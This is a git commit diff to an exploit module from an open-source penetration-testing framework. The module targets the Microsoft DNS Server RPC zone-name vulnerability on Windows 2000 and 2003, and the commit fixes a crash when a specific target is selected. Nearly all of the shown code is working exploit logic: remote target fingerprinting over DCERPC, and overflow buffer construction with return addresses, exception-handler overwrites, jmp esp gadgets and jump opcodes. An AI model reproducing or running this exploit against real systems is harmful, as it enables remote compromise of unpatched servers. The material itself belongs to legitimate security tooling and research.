Fix for the crash error when a specific target is selected

git-svn-id: file:///home/svn/framework3/trunk@5016 4d416f70-5f16-0410-b530-b9f4589650da
2007-07-03 04:21:44 +00:00 · 2007-07-03 04:21:44 +00:00 · fb7291877d
parent d0b15d3d72
commit fb7291877d
1 changed files with 16 additions and 11 deletions
--- a/modules/exploits/windows/dcerpc/msdns_zonename.rb
+++ b/modules/exploits/windows/dcerpc/msdns_zonename.rb
@ -124,6 +124,9 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 			print_status("Discovered Microsoft DNS Server RPC service on port #{dport}")
 		end
 		mytarget = nil
 		if (target.name =~ /Automatic/)
 			# scheduler service is only available on 2k3 SP0 and 2000
@ -131,24 +134,26 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 			if (not schedport)
 				print_status("Detected a Windows 2003 SP1-SP2 target...")
-				target = gettarget('2003SP12')
+				mytarget = gettarget('2003SP12')
 			else
 				# only available on 2003 SP0
 				schedport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53', '1.0', 'ncacn_ip_tcp')
 				if (not schedport)
 					print_status("Detected a Windows 2000 SP0-SP4 target...")					
-					target = gettarget('2000')
+					mytarget = gettarget('2000')
 				else
 					print_status("Detected a Windows 2003 SP0 target...")										
-					target = gettarget('2003SP0')
+					mytarget = gettarget('2003SP0')
 				end
 			end
-			if (not target)
+			if (not mytarget)
 				print_status("There is no available target for this locale")
 				return
 			end
 		else
 			mytarget = target
 		end
@ -170,7 +175,7 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 			txt[0, payload.encoded.length] = payload.encoded
 			off = target['Off']
-			txt[ off ] = [target.ret].pack('V')
+			txt[ off ] = [mytarget.ret].pack('V')
 			txt[ off - 4, 2] = "\xeb\x06"
 			txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')		
@ -178,11 +183,11 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 			txt[0, payload.encoded.length] = payload.encoded
 			off = target['Off']
-			txt[ off ] = [target['Rets'][0]].pack('V')  # __except_handler3
+			txt[ off ] = [mytarget['Rets'][0]].pack('V')  # __except_handler3
 			txt[ off - 4, 2] = "\xeb\x16"
 			# addr = A + B*12 + 4 = 0x77f7e7f0  (ntdll -> 0x77f443c9)
-			addr = target['Rets'][1] - 4
+			addr  = mytarget['Rets'][1] - 4
 			addr1 = addr / 2
 			addr2 = addr1 + addr % 2
 			addr1 = addr1 + (addr2 % 12)
@ -200,12 +205,12 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 			# 0x77f443d5 leave    ; mov esp, ebp
 			# 0x77f443d6 retn     ; ret
-			txt[ off + 16, 4] = [target['Rets'][2]].pack('V')  # jmp esp
+			txt[ off + 16, 4] = [mytarget['Rets'][2]].pack('V')  # jmp esp
 			txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V')	
-		elsif (target['OS'] =~ /2003SP12/)
+		elsif (mytarget['OS'] =~ /2003SP12/)
-			off = target['Off']
+			off = mytarget['Off']
-			ib  = target['IB']
+			ib  = mytarget['IB']
 			txt[ off ] = [ib + 0x2566].pack('V')